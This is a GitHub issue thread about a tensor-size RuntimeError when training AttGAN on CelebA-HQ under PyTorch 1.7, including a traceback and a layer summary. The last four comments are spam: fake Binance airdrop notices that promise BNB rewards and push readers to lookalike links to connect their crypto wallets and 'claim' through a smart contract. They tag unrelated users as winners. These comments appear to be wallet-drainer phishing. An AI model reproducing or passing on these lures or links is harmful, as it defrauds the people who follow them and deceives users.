### ISSUE TITLE
AttGAN RuntimeERROR:Sizes of tensors must match except in dimension 1

### ISSUE THREAD

**Issue by GuanlinLee** [elvisyjlin/AttGAN-PyTorch#27]
Hi, when I use Pytorch-1.7 to train AttGAN from scratch, a RuntimeERROR appears. There are more details:

Traceback (most recent call last):
  File "train.py", line 161, in <module>
    errD = attgan.trainD(img_a, att_a, att_a_, att_b, att_b_)
  File "/home/AttGAN/attgan.py", line 198, in trainD
    img_fake = self.G(img_a, att_b_).detach()
  File "/home/anaconda3/lib/python3.6/site-packages/torch/nn/modules/module.py", line 727, in _call_impl
    result = self.forward(*input, **kwargs)
  File "/home/AttGAN/attgan.py", line 78, in forward
    return self.decode(self.encode(x), a)
  File "/home/AttGAN/attgan.py", line 68, in decode
    z = torch.cat([z, zs[len(self.dec_layers) - 2 - i]], dim=1)
RuntimeError: Sizes of tensors must match except in dimension 1. Got 8 and 9 in dimension 2 (The offending index is 1)

Could you help me solve this? THX.

**Comment by elvisyjlin** [comment]
Could you tell me what command you used to train it?

**Comment by GuanlinLee** [comment]
CUDA_VISIBLE_DEVICES=0 \
python train.py \
--data CelebA-HQ \
--img_size 128

**Comment by elvisyjlin** [comment]
Did you follow the instruction here (https://github.com/willylulu/celeba-hq-modified) to prepare the __CelebA-HQ__ dataset? Since you specified `--data CelebA-HQ` in the training command. If you only downloaded the images and attributes of CelebA, please train with this option `--data CelebA`.

Did you change any code before training? The clean code should work for CelebA and CelebA-HQ. If you change the default arguments of any functions, error could happen. Please set any argument by the specifying them in the command instead of changing code.

**Comment by GuanlinLee** [comment]
I did not change any of your code. And I train STGAN and STARGAN on this dataset without any error. It seems like a new layer named Generator-40 is created in Pytorch-1.7.
 
----------------------------------------------------------------
        Layer (type)               Output Shape         Param #
================================================================
            Conv2d-1            [4, 64, 64, 64]           3,072
       BatchNorm2d-2            [4, 64, 64, 64]             128
         LeakyReLU-3            [4, 64, 64, 64]               0
       Conv2dBlock-4            [4, 64, 64, 64]               0
            Conv2d-5           [4, 128, 32, 32]         131,072
       BatchNorm2d-6           [4, 128, 32, 32]             256
         LeakyReLU-7           [4, 128, 32, 32]               0
       Conv2dBlock-8           [4, 128, 32, 32]               0
            Conv2d-9           [4, 256, 16, 16]         524,288
      BatchNorm2d-10           [4, 256, 16, 16]             512
        LeakyReLU-11           [4, 256, 16, 16]               0
      Conv2dBlock-12           [4, 256, 16, 16]               0
           Conv2d-13             [4, 512, 8, 8]       2,097,152
      BatchNorm2d-14             [4, 512, 8, 8]           1,024
        LeakyReLU-15             [4, 512, 8, 8]               0
      Conv2dBlock-16             [4, 512, 8, 8]               0
           Conv2d-17            [4, 1024, 4, 4]       8,388,608
      BatchNorm2d-18            [4, 1024, 4, 4]           2,048
        LeakyReLU-19            [4, 1024, 4, 4]               0
      Conv2dBlock-20            [4, 1024, 4, 4]               0
  ConvTranspose2d-21            [4, 1024, 8, 8]      16,990,208
      BatchNorm2d-22            [4, 1024, 8, 8]           2,048
             ReLU-23            [4, 1024, 8, 8]               0
ConvTranspose2dBlock-24            [4, 1024, 8, 8]               0
  ConvTranspose2d-25           [4, 512, 16, 16]      12,689,408
      BatchNorm2d-26           [4, 512, 16, 16]           1,024
             ReLU-27           [4, 512, 16, 16]               0
ConvTranspose2dBlock-28           [4, 512, 16, 16]               0
  ConvTranspose2d-29           [4, 256, 32, 32]       2,097,152
      BatchNorm2d-30           [4, 256, 32, 32]             512
             ReLU-31           [4, 256, 32, 32]               0
ConvTranspose2dBlock-32           [4, 256, 32, 32]               0
  ConvTranspose2d-33           [4, 128, 64, 64]         524,288
      BatchNorm2d-34           [4, 128, 64, 64]             256
             ReLU-35           [4, 128, 64, 64]               0
ConvTranspose2dBlock-36           [4, 128, 64, 64]               0
  ConvTranspose2d-37           [4, 3, 128, 128]           6,147
             Tanh-38           [4, 3, 128, 128]               0
ConvTranspose2dBlock-39           [4, 3, 128, 128]               0
        Generator-40           [4, 3, 128, 128]               0
================================================================
Total params: 43,459,203
Trainable params: 43,459,203
Non-trainable params: 0
----------------------------------------------------------------
Input size (MB): 9.75
Forward/backward pass size (MB): 188.00
Params size (MB): 165.78
Estimated Total Size (MB): 363.53
----------------------------------------------------------------

**Comment by elvisyjlin** [comment]
That's interesting... Would you mind giving it a try with other PyTorch version such as 1.5.0? That's the version I tested a few weeks ago.

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @thimper, @rohitjha, @Takuya-0624, @4heck, @ashishgopalhattimare, @bitcointrail, @whiteath

**Comment by drfabiocastro** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @aurevae, @fkGfwNiubility, @SIMPLYBOYS, @Sunqinying, @levi0214, @zz-my-coder, @chentihe

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://public.bnbstatic.com/image/cms/content/body/202401/419d0457e5bda211db09c4d5ae180da6.png)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @kangarang, @imollov, @AI-Chef, @samburgers, @darrylyeo, @xkim1994, @philippzentner
